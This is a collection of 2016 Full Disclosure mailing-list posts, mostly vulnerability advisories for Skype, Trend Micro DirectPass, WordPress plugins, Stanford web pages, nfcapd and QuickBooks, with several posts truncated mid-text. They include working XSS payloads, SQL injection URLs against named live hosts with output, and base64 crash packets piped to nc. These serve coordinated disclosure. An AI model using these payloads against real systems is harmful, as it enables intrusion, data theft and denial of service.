[FD] Skype Manager - (Email Change) Filter Bypass Vulnerability

[Vulnerability Lab]

Document Title:
===
Skype Manager - (Email Change) Filter Bypass Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1672

MSRC Case 32353 TRK:0001002845


Release Date:
=
2016-05-09


Vulnerability Laboratory ID (VL-ID):

1672


Common Vulnerability Scoring System:

5.2


Product & Service Introduction:
===
Skype is a proprietary voice-over-Internet Protocol service and software 
application originally created in 2003 by Swedish entrepreneur 
Niklas Zennström and his Danish partner Janus Friis. It has been owned by 
Microsoft since 2011. The service allows users to communicate 
with peers by voice, video, and instant messaging over the Internet. Phone 
calls may be placed to recipients on the traditional telephone 
networks. Calls to other users within the Skype service are free of charge, 
while calls to landline telephones and mobile phones are charged 
via a debit-based user account system. Skype has also become popular for its 
additional features, including file transfer, and videoconferencing. 
Competitors include SIP and H.323-based services, such as Linphone, as well as 
the Google Talk service, Mumble and Hall.com.

Skype has 663 million registered users as of September 2011. The network is 
operated by Microsoft, which has its Skype division headquarters 
in Luxembourg. Most of the development team and 44% of the overall employees of 
the division are situated in Tallinn and Tartu, Estonia.

Unlike most other VoIP services, Skype is a hybrid peer-to-peer and 
client–server system. It makes use of background processing on computers 
running Skype software. Skype`s original proposed name (Sky Peer-to-Peer) 
reflects this fact. Some network administrators have banned Skype 
on corporate, government, home, and education networks, citing reasons such as 
inappropriate usage of resources, excessive bandwidth usage, 
and security concerns.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype)


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a hidden function 
to change unauthorized email accounts of the official Skype Manager 
web-application.


Vulnerability Disclosure Timeline:
==
2016-01-19: Researcher Notification & Coordination (Karim Rahal)
2016-01-20: Vendor Notification (MSRC - Skype Security Team)
2016-01-28: Vendor Response/Feedback (MSRC - Skype Security Team)
2016-05-05: Vendor Fix/Patch #(Microsoft Skype Developer Team)
2016-05-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Microsoft Corporation
Product: Skype Manager - Online Service (Web-Application) 2016 Q1


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A filter bypass vulnerability has been discovered in the official Microsoft 
Skype Manager online service web-application.
The vulnerability allows to bypass a secure set filter restriction of the 
web-application to deny unauthorized 
interaction by criminals on account take-over attacks.

Filter bypass is a vulnerability which performs evasion on a certain filter and 
bypasses it, in this case it was able to bypass 
the filter which didn`t allow a user/attacker to change his email without 
entering his password etc.. but with this filter bypass
you can just change ur email simply through being inside the account, you don`t 
even have to know the account`s password.

This filter bypass is done because there isn`t enough validation/checking 
inside the API which didn`t check if its his actual email 
or if he can actually change it, in addition, this vulnerability easily allowed 
Full account Takeover once exploited, simply a 
hacker would hack into an account throgh session but he wouldn`t have full 
access because he doesn`t have the password, but this 
filter bypass allowed him to change password then send a change password link 
to the changed email which is his hacking email, 
and then he resets the password and tadaa! he now has full access to the 
account.

The security risk of the filter bypass vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) count of 5.2. 
Exploitation of the filter and validation web vulnerability requires a low 
privileged skype user account with restricted access and low user interaction. 
Successful exploitation of the vulnerability results in an account take-over 
one malicious interaction.


Proof of Concept (PoC):
===
The vulnerability can be exploited by remote attackers with low privileged 
skype web-application user account and low user interaction.
For security demonstration or to reprod

[FD] Notes v4.5 iOS - Arbitrary File Upload Vulnerability

[Vulnerability Lab]

Document Title:
===
Notes v4.5 iOS - Arbitrary File Upload Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1832


Release Date:
=
2016-04-25


Vulnerability Laboratory ID (VL-ID):

1832


Common Vulnerability Scoring System:

6.4


Product & Service Introduction:
===
xNotes, My Personal Documents, Diary.

(Copy of the Homepage:  
http://appshopper.com/utilities/x-notes-my-personal-documents  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered an arbitrary file 
upload vulnerability in the official Notes v4.5 iOS mobile web-application 
(wifi).


Vulnerability Disclosure Timeline:
==
2016-04-25: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Shanmin Xu
Product: xNotes - Mobile API (Web-Application) 4.5


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A arbitrary file upload web vulnerability has been discovered in the official 
Notes v4.5 iOS mobile web-application (wifi).
The local file include web vulnerability allows remote attackers to 
unauthorized include local file/path requests via POST.

The web vulnerability is located in the `filename` values of the `Upload File` 
module. Remote attackers are able to inject own 
files with malicious `filename` values in the `upload.action` POST method 
request to compromise the mobile web-application. 
The arbitrary file upload execute occcurs in the index file dir listing of the 
wifi interface. The attacker is able to inject 
the local file upload form request by usage of the `wifi interface` in 
connection with the vulnerable upload service module.

The security risk of the vulnerability is estimated as high with a cvss (common 
vulnerability scoring system) count of 6.4. 
Exploitation of the arbitrary file upload vulnerability requires no user 
interaction or privileged web-application user account. 
Successful exploitation of the arbitrary file upload web vulnerability results 
in mobile web-application or device compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] File Dir Index Listing


Proof of Concept (PoC):
===
The file include web vulnerability can be exploited by remote attackers without 
privileged user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1.  Install the vulnerable ios web-application to your ios device
2.  Start the application
3.  Open the file transfer button on the buttom left
4.  Open the called IP in a web-browser
5.  Surf to the Upload function and choose a random test image/picture
6.  Start a http session tamper to exploit the followup POSt method request
7.  Inject your local file request to the filename value for exploitation
8.  Continue the request
9.  The local file include issue executes in the filename value in the next step
10. Successful reproduce of the local file include vulnerability!


PoC: Exploitation
http://localhost:51025/./[ARBITRARY FILE UPLOAD VULNERABILITY! PHP]/


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:51025/ 
   Request Header:
  Host[localhost:51025]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 
Firefox/45.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  Referer[http://localhost:51025/]
  Connection[keep-alive]
   POST-Daten:
  POST_DATA[-60382496219157
Content-Disposition: form-data; name="file"; filename="./[ARBITRARY FILE UPLOAD 
VULNERABILITY! PHP]/"


Security Risk:
==
The security risk of the arbitrary file upload web vulnerability in the ios 
web-application is estimated as high. (CVSS 6.4)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com) [www.vulnerability-lab.com] 
[http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, 
including the warranties of merchantability and c

[FD] Wordpress Truemag Theme - Client Side Cross Site Scripting Web Vulnerability

[Vulnerability Lab]

Document Title:
===
Wordpress Truemag Theme - Client Side Cross Site Scripting Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1839


Release Date:
=
2016-04-29


Vulnerability Laboratory ID (VL-ID):

1839


Common Vulnerability Scoring System:

3.3


Product & Service Introduction:
===
CactusThemes is an experienced and passionate web design team with over 8 years 
working together designing and developing 
themes and plugins. Our goal is to create the best WordPress themes for 
education, event, news, etc. and meet all your needs. 

(Copy of the Homepage: http://www.cactusthemes.com/#themes )


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a client-side 
cross site scripting vulnerability in the official Wordpress Truemag Theme.


Vulnerability Disclosure Timeline:
==
2016-04-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

CactusThemes 
Product: Truemag Theme (Wordpress) - Theme (Web-Application) 2016 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A client-side cross site scripting web vulnerability has been discovered in the 
official Wordpress Truemag Theme web-application.
The non-persistent vulnerability allows remote attackers to inject own 
malicious script code to client-side application to browser requests.

The client-side cross site vulnerability is located in the `s` value of the 
page module GET method request. Remote attackers are able to inject 
own malicious script codes to the client-side of the online service 
web-application to compromise user session information or data. The request 
method to execute is GET and the attack vector is non-persistent. 

The security risk of the client-side web vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the non-persistent web vulnerability requires no privileged web 
application user account and low user interaction (click link). 
Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing, non-persistent external redirects, 
non-persistent load of malicious script codes or non-persistent web module 
context manipulation.

Request Method(s):
[+] GET

Vulnerable Service(s):
[+] Truemag Theme (Wordpress)

Vulnerable Module(s):
[+] /wp-contact/theme/truemag

Vulnerable Parameter(s):
[+] s


Proof of Concept (PoC):
===
The remote cross site vulnerability can be exploited by remote attackers 
without privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Dork(s):
inurl: /wp-contact/theme/truemag

PoC: Payload
">%20alert(document.cookie)


PoC: Example
http://wp.localhost:8080/?s=[CLIENT SIDE CROSS SITE SCRIPTING VULNERABILITY!]


PoC: Exploitation
http://wp.localhost:8080/?s=";>%20alert(document.cookie)


Reference(s):
http://wp.localhost:8080/?s=


Solution - Fix & Patch:
===
The vulnerability can be patched by a secure parse and encode of the vulnerable 
`s` value in the webpage GET method request.
Encode the parameter and restrict the value input to prevent further script 
code injection attacks.


Security Risk:
==
The security risk of the client-side cross site scripting web vulnerability in 
the vulnerbale `s` value is estimated as medium. (CVSS 3.3)


Credits & Authors:
==
Iran Cyber Security Group - 0x3a (ICG SEC) [Iran-Cyber.Net] 
[http://www.vulnerability-lab.com/show.php?user=Iran%20Cyber%20Security]
Special Thanks: root3r


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, 
including the warranties of merchantability and capability for a particular 
purpose. Vulnerability-Lab or its suppliers are not liable in any case of 
damage, 
including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been 
advised 
of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages so the 
foregoing 
limitation may not apply. We do not approve or encourage anybody to break any 
licenses, polic

[FD] Trend Micro Direct Pass - Filter Bypass & Cross Site Scripting Vulnerability

[Vulnerability Lab]

Document Title:
===
Trend Micro Direct Pass - Filter Bypass & Cross Site Scripting Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1716

Trend Micro Security ID: 1-1-1039900197


Release Date:
=
2016-05-01


Vulnerability Laboratory ID (VL-ID):

1716


Common Vulnerability Scoring System:

4.3


Product & Service Introduction:
===
DirectPass runs as a local console and browser plug-in but can also sync 
between multiple PC installations through your Trend Micro account. 
Unlike LastPass 1.72 (free, 5 stars), Dashlane (free, 4.5 stars), and RoboForm 
Everywhere 7 ($19.95 direct, 4.5 stars), it doesn`t let you 
log in to your saved credentials online. However, it will sync with free 
DirectPass apps for Android and iPhone. You can also test a free 
edition that manages just five passwords.

DirectPass can export its data for import to another DirectPass installation. 
It can also import login data from LastPass. Hoping to get a 
fast start, I imported my 200+ LastPass logins. The results were disappointing. 
For starters, DirectPass doesn`t include the ability to 
categorize sites, so my passwords came through as an unordered list, a very 
long list. There`s no way to sort the list, and no provision to 
search for a particular login. For some reason, clicking in the list`s scroll 
bar doesn`t scroll down by one  `page` of items. Instead, it 
scrolls to the corresponding location in the list. Finding any particular login 
required tediously scrolling through the entire list.

(Copy of the Vendor Homepage: https://www.directpass.com/signin )


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a filter bypass 
issue and cross site vulnerability in the official Trend Micro Direct Pass 
web-application.


Vulnerability Disclosure Timeline:
==
2016-02-08: Researcher Notification & Coordination (Karim Rahal)
2016-02-09: Vendor Notification (Trend Micro Security Team)
2016-02-10: Vendor Response/Feedback (Trend Micro Security Team)
2016-04-27: Vendor Fix/Patch (Trend Micro Developer Team)
2016-05-01: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Trend Micro
Product: DirectPass 2016 Q1


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A filter bypass and cross site scripting vulnerability has been discovered in 
the official Trend Micro DirectPass online service web-application.
The vulnerability allows remote attackers to bypass the filter restrictions of 
the web-application validation procedure mechanism.
The cross site vulnerability allows an attacker to inject own malicious script 
codes on the application-side of the vulnerable modules context.

There is a filter which filters special characters in the website, but it was 
bypassed through filter-evasion by a live session tamper for http.
The mechanism does approve the direct input but does not filter the request 
context itself. Thus allows an attacker to bypass the basic special char filter.
The cross site issue is inside the `(title) has been deleted` once you delete a 
password listed, replace (title) with a xss payload would execute 
the cross site scripting payload. 


Proof of Concept (PoC):
===
The filter bypass and cross site vulnerability can be exploited by remote 
attackers with low privileged web-application user account and low user 
interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1.  Go to pwm.trendmicro.com
2.  Make sure you have the Trend Micro Password Manager (Direct Pass) extension 
installed
3.  Go to add a new password
4.  Open a proxy interpreting tool (livehttpheaders / tamper data / burpsuite)
5.  Insert a title and the rest of the information while interpreting/tampering 
the requests
6.  Then edit the POST request which is sent to localhost:49154 and has the 
information of the new password
7.  Now edit "DisplayName":"(your title)" to "DisplayName":"'>" (this will alert "XSS")
8.  Then edit "ID":"(id)" and add anything to it like "ID":"anything(id)"
9.  Now replay the request
10. Go back to pwm.trendmicro.com
11. Check your passwords and you will see that you were able to put invalid 
characters to the title! [Filter Bypass=done]
12. Now delete the password
13. The xss will alert with cookie! [XSS=done]
14. Successful reproduce of the vulnerability!


PoC: Video
https://www.youtube.com/watch?v=cgN2c4bZniY


Security Risk:
==
The security risk of the filter bypass issue and cross 

[FD] Stanford University - Multiple SQL Injection Vulnerabilities

[Vulnerability Lab]

Document Title:
===
Stanford University - Multiple SQL Injection Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1829


Release Date:
=
2016-05-09


Vulnerability Laboratory ID (VL-ID):

1829


Common Vulnerability Scoring System:

7.8


Product & Service Introduction:
===
Stanford University, located between San Francisco and San Jose in the heart of 
California's Silicon Valley, is one of 
the world's leading teaching and research universities. Since its opening in 
1891, Stanford has been dedicated to finding 
solutions to big challenges and to preparing students for leadership in a 
complex world.

(Copy of the Homepage: http://www.stanford.com/about/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple 
sql-injection vulnerabilities in the official Stanford University online 
service web-application.


Vulnerability Disclosure Timeline:
==
2016-04-19: Researcher Notification & Coordination (Benjamin Kunz Mejri - 
Evolution Security GmbH)
2016-04-20: Vendor Notification (Campus Security Department)
2016-04-22: Vendor Response/Feedback (Campus Security Department)
2016-05-06: Vendor Fix/Patch (Stanford Site Developer Team)
2016-05-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Stanford
Product: Stanford University - Online Service (Web-Application) 2016 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A remote sql-injection web vulnerability has been discovered  in the official 
Stanford University online service web-application.
The vulnerability allows remote attackers and privileged user accounts to 
execute own sql commands to compromise the web-server or dbms.

The vulnerability is located in the `id` value of the `getevent.php` file GET 
method request. Remote attackers are able to execute own 
malicious sql commands via id value to compromise the web-server or connected 
database management system. The issue is a classic 
remote sql injection vulnerability. The request method to execute is GET and 
the attack vector is located on the application-side of the
active web-service.

The security risk of the sql-injection vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) count of 7.8.
Exploitation of the remote sql injection web vulnerability requires no user 
interaction and a low privileged web-application user account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] getevent.php

Vulnerable Parameter(s):
[+ id



Proof of Concept (PoC):
===
The sql-injection vulnerability can be exploited by remote attackers without 
privileged user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


PoC: Example
http://[URL]/[PATH]/[Module]/[CGI-BIN]/[PAGE]?[ID]=[SQL-INJECTION!]


PoC: Exploitation
http://www.stanford.com/dept/asianlang/cgi-bin/about/getevent.php?id=1%20union%20select%201,user%28%29,3,4,5,version%28%29,7,8
http://www.stanford.com/dept/asianlang/cgi-bin/about/getevent.php?id=1%20union%20select%201,user%28%29,3,4,5,version%28%29,7,8
http://ealc.stanford.edu/about/getevent.php?id=1%20union%20select%201,user%28%29,3,4,5,version%28%29,7,8
http://ceas.stanford.edu/oldSite/events/getevent.php?id=-1%20union%20select%201,user%28%29,3,4,5,version%28%29,7,8


PoC: Output Exploitation

  
November 30, 2002 /
  
  
5.5.47-0+deb7u1-log  
  
dasianlangde...@www02.stanford.edu
  
  
4: am—
5: am  
  
7
8  



Reference(s):
http://www.stanford.com/
http://www.stanford.com/dept/
http://www.stanford.com/dept/asianlang/
http://www.stanford.com/dept/asianlang/cgi-bin/
http://www.stanford.com/dept/asianlang/cgi-bin/about/
http://ceas.stanford.edu/oldSite/events/
http://ealc.stanford.edu/about/


Security Risk:
==
The security risk of the sql-injection vulnerabilities in the stanford online 
service web-application is estimated as medium. (CVSS 7.8)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com) [www.vulnerability-lab.com] 
[http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]


Disclaimer & Information:
=
The information provided in this advisory is provided as it is wit

[FD] Nfdump Nfcapd 1.6.14 Multiple Vulnerabilities

[Denis Andzakovic]

(, ) (,
  .   '.' ) ('.',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _/  / _  \     _
 \  \==/ /_\  \ _/ ___\/  _ \ / \
 /   \/   |\\  \__(  <_> )  Y Y  \
/__  /\___|__  / \___  >/|__|_|  /
\/ \/.-.\/ \/:wq
(x.0)
  '=.|w|.='
  _=''"''=.

presents..
Nfdump Nfcapd Multiple Vulnerabilities
Affected Versions: Nfdump <= 1.6.14

PDF: 
http://www.security-assessment.com/files/documents/advisory/Nfdump%20nfcapd%201.6.14%20-%20Multiple%20Vulnerabilities.pdf

+-+
| Description |
+-+
This document details multiple vulnerabilities found within the nfcapd netflow 
collector daemon. An unauthenticated
attacker may leverage these vulnerabilities to trigger a denial of service 
condition within the nfcapd daemon. Two 
read based heap overflow vulnerabilities were found within the IPFIX processing 
code and one logic based denial of 
service was found in the Netflow V9 processing code.

+--+
| Exploitation |
+--+
== Process_ipfix_template_add heap overflow ==
By tampering the flowset_length parameter within an IPFIX packet, an attacker 
can trigger a denial of service condition 
within nfcapd. Line 931 in file ipfix.c decrements the size_left value by 4, 
and by triggering a condition where the 
initial value is less than 4, eg. 1 as in the below POC, an integer underflow 
occurs. This wraps the size_left value 
(indicating the remaining packet payload to be processed) to 4294967293, 
resulting in nfcapd continuously processing the
heap-based buffer allocated for the input packet (allocated at line 381 of 
nfcapd.c) until it eventually hits invalid 
memory and crashes with a segmentation fault. 

--[ Process_ipfix_template_add heap overflow POC
echo "AAoABQACAAUBAA==" | base64 -d | nc -u 127.0.0.1 

== Process_ipfix_option_templates heap overflow ==
By submitting an IPFIX packet with a flowset id of 3 and a large 
scope_field_count parameter (65535 in the below POC), 
nfcapd will continuously process the heap-based buffer allocated for the 
packet, eventually hitting an invalid memory 
address and crashing with a segmentation fault. The scope_field_count is taken 
directly from the packet (line 1108, 
ipfix.c) and is subsequently used in the for loop processing the packet 
contents (line 1138, ipfix.c)

--[ Process_ipfix_option_templates heap overflow POC
echo "AAoAAQADAAoA/wAA//8=" | base64 -d | nc -u 
127.0.0.1 

== Process_v9_data infinite loop ==
By sending a crafted packet, an attacker can cause the nfcapd daemon to enter 
an infinite loop. As well as consuming a 
considerable amount of processing power, this infinite loop will eventually 
exhaust all available disk space. Once disk
space is exhausted, the nfcapd daemon will exit. 

The infinite loop is triggered due to the table->input_record_size variable 
being set to zero. As the Process_v9_data 
method processes the packet, table->input_record_size is subtracted from the 
size_left variable, with the intention being 
that once size_left is zero the processing is concluded. As size_left is being 
decremented by zero each loop, this while 
loop (line 1529, netflow_v9.c) runs infinitely.

--[ Process_v9_data infinite loop POC 
echo "AAkUBAQAAAYA/w==" | 
base64 -d | nc -u 127.0.0.1 

Further information is available in the PDF version of this advisory. 

+--+
| Solution |
+--+
Upgrade to the latest Nfdump codebase (commit 
6ef51a7405797289278b36a9a7deabb3cb64d80c or later)

+--+
| Timeline |
+--+

12/03/2016 - Advisory sent to Peter Haag
19/03/2016 - Advisory acknowledged
07/05/2016 - Additional information requested
07/05/2016 - Updated version released on GitHub
10/05/2016 - Advisory release

+---+
| About Security-Assessment.com |
+---+

Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security 
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the 
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings, 
contact us:

Web 

[FD] Intuit QuickBooks 2007 - 2016 Arbitrary Code Execution

[Thegrideon Software]

+ Credits: Maxim Tomashevich from Thegrideon Software
+ Website: https://www.thegrideon.com/
+ Details: https://www.thegrideon.com/qb-internals-sql.html

Vendor:
-
www.intuit.com, www.intuit.ca, www.intuit.co.uk

Product:
-
QuickBooks Desktop versions: 2007 - 2016

Vulnerability Type:
-
Arbitrary SQL / Code Execution

Vulnerability Details:
-
QuickBooks company files are SQL Anywhere database files and other QB
formats are based on SQL Anywhere features as well. SQL code (Watcom SQL) is
important part of QB workflow and it is arguably more powerful than VBA in
MS Access or Excel and at the same time it is completely hidden and starts
automatically with every opened file!
Functions like xp_write_file, xp_cmdshell are included by default allowing
"rootkit" installation in just 3 lines of code: get data from table ->
xp_write_file -> xp_cmdshell. Procedure in one database can be used to
insert code into another directly or using current user credential. Moreover
real database content is hidden from QuickBooks users, so there is virtually
unlimited storage for code, stolen data, etc.
QBX (accountant's transfer copies) and QBM (portable company files) are even
easier to modify but supposed to be send to outside accountant for
processing during normal workflow. QBX and QBM are compressed SQL dumps, so
SQL modification is as hard as replacing zlib compressed "reload.sql" file
inside compound file!

In all cases QuickBooks do not attempt (and have no ways) to verify SQL
scripts and start them automatically with "DBA" privileges, thus it should
be obvious that all outside files (qbw, qba, qbx, qbm) should be considered
extremely dangerous.
SQL Anywhere is built for embedded applications so there are number of
tricks and functions (like SET HIDDEN clause) to protect SQL code from
analysis making this severe QuickBooks design flaw.

Proof of Concept:
-
Below you can find company file created in QB 2009 and modified to start
"Notepad.exe" upon every user login (Admin, no pass). This example will work
in any version including 2016 (US, CA, UK) - login procedure execution is
required in order to check QB version or edition or to start update, so you
will see Notepad before QB "wrong version" error message.
https://www.thegrideon.com/qbint/QBFp.zip

Disclosure Timeline:
-
Contacted Vendor: 2016-03-21
Contacted PCI Security Consul: 2016-04-15
PCI Security Consul: 2016-04-19 "we are looking into this matter", but no
details requested.
PoC sent to Vendor: 2016-04-26
[unexpected and strange day by day activity from Intuit India employees on
our website without any attempts to communicate -> public disclosure.]
Public Disclosure: 2016-05-10

Severity Level:
-
High

Disclaimer:
-
Permission is hereby granted for the redistribution of this text, provided
that it is not altered except by reformatting, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author. The author is not
responsible for any misuse of the information contained herein and prohibits
any malicious use of all security related information or exploits by the
author or elsewhere.



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CFP: Passwords 2016, Ruhr-University Bochum, Germany, Dec 5-7

[Per Thorsheim]

Call for Papers
The 11th International Conference on Passwords
PASSWORDS 2016

5-7 December 2016
Ruhr-University Bochum, Germany

https://passwords2016.rub.de/



The Passwords conference was launched in 2010 as a response to
the lack of robustness and usability of current personal
authentication practices and solutions. Annual participation has
doubled over the past three years. Since 2014, the conference
accepts peer-reviewed papers.


* IMPORTANT DATES *

Research papers and short papers:
- Title and abstract submission: 2016-07-04 (23:59 UTC-11)
- Paper submission: 2016-07-11 (23:59 UTC-11)
- Notification of acceptance: 2016-09-05
- Camera-ready from authors: 2016-09-19

Hacker Talks:
- Talk proposal submission: 2016-09-15 (23:59 UTC-11)
- Notification of acceptance: 2016-09-30


* CONFERENCE AIM *

More than half a billion user passwords have been compromised
over the last five years, including breaches at internet
companies such as Target, Adobe, Heartland, Forbes, LinkedIn,
Yahoo, and LivingSocial. Yet passwords, PIN codes, and similar
remain the most prevalent method of personal
authentication. Clearly, we have a systemic problem.

This conference gathers researchers, password crackers, and
enthusiastic experts from around the globe, aiming to better
understand the challenges surrounding the methods personal
authentication and passwords, and how to adequately solve these
problems. The Passwords conference series seek to provide a
friendly environment for participants with plenty opportunity to
communicate with the speakers before, during, and after their
presentations.

* SCOPE *

We seek original contributions that present attacks, analyses,
designs, applications, protocols, systems, practical experiences,
and theory. Submitted papers may include, but are not limited to,
the following topics, all related to passwords and
authentication:

- Technical challenges and issues:
- Cryptanalytic attacks
- Formal attack models
- Cryptographic protocols
- Dictionary attacks
- Digital forensics
- Online attacks/Rate-limiting
- Side-channel attacks
- Administrative challenges:
- Account lifecycle management
- User identification
- Password resets
- Cross-domain and multi-enterprise system access
- Hardware token administration
- Password "replacements":
- 2FA and multifactor authentication
- Risk-based authentication
- Password managers
- Costs and economy
- Biometrics
- Continous authentication
- FIDO - U2F
- Deployed systems:
- Best practice reports
- Incident reports/Lessons learned
- Human factors:
- Usability
- Design & UX
- Social Engineering
- Memorability
- Accessibility
- Pattern predictability
- Gestures and graphical patterns
- Psychology
- Statistics (languages, age, demographics...)
- Ethics


* INSTRUCTIONS FOR AUTHORS *

Papers must be submitted as PDF using the Springer LNCS format
for Latex. Abstract and title must be submitted one week ahead of
the paper deadline.

We seek submissions for review in the following three categories:

- Research Papers
- Short Papers
- "Hacker Talks" (talks without academic papers attached)

RESEARCH PAPERS should describe novel, previously unpublished
technical contributions within the scope of the call. The papers
will be subjected to double-blind peer review by the program
committee. Paper length is limited to 16 pages (LNCS format)
excluding references and well-marked appendices. The paper
submitted for review must be anonymous, hence author names,
affiliations, acknowledgements, or obvious references must be
temporarily edited out for the review process. The program
committee may reject non-anonymized papers without reading
them. The submitted paper (in PDF format) must follow the
template described by Springer at
http://www.springer.de/comp/lncs/authors.html.

SHORT PAPERS will also be subject to peer review, where the
emphasis will be put on work in progress, hacker achievements,
industrial experiences, and incidents explained, aiming at
novelty and promising directions. Short paper submissions should
not be more than 6 pages in standard LNCS format in total. A
short paper must be labeled by the subtitle "Short
Paper". Accepted short paper submissions may be included in the
conference proceedings. Short papers do not need to be
anonymous. The program committee may accept full research papers
as short papers.

HACKER TALKS are presentations without an academic paper
attached. They will typically explain new methods, techniques,
tools, systems, or services within the Passwords scope. Proposals
for Hacker Talks can be submitted by anybody ("hackers",
academics, students, enthusiasts, etc.) in any format, but
typically will include a brief (2-3 paragraphs) description of
the talk's content and the person presenting. They will be
evaluated by a separate subcommittee led by Per Thorsheim,
according to different criteria than t

[FD] BulletProof Security 53.3 - Security Advisory - Multiple XSS Vulnerabilities

[Onur Yilmaz]

Information

Advisory by Netsparker
Name: Multiple XSS Vulnerabilities in BulletProof Security
Affected Software : BulletProof Security
Affected Versions: v53.3 and possibly below
Vendor Homepage : https://wordpress.org/plugins/bulletproof-security/
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
Netsparker Advisory Reference : NS-16-004

Technical Details

Proof of Concept URLs for XSS vulnerabilities in BulletProof Security v53.3:

URL 
/wordpress/wp-admin/admin.php?page=bulletproof-security/admin/security-log/security-log.php
Parameter Name user-agent-ignore
Parameter Type POST
Attack Pattern '"-->alert(0x001E32)

For more information on cross-site scripting vulnerabilities read the
article Cross-site Scripting (XSS).

Advisory Timeline

15 Mar 2016 - First Contact
23 Mar 2016 - Vendor Fixed
09 May 2016 - Advisory Released

Solution

Update the plugni.

Credits & Authors

These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner.

About Netsparker

Netsparker web application security scanners find and report security
flaws and vulnerabilities such as SQL Injection and Cross-site
Scripting (XSS) in all websites and web applications, regardless of
the platform and technology they are built on. Netsparker scanning
engine’s unique detection and exploitation techniques allow it to be
dead accurate in reporting vulnerabilities. The Netsparker web
application security scanner is available in two editions; Netsparker
Desktop and Netsparker Cloud. Visit our website
https://www.netsparker.com for more information.

Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/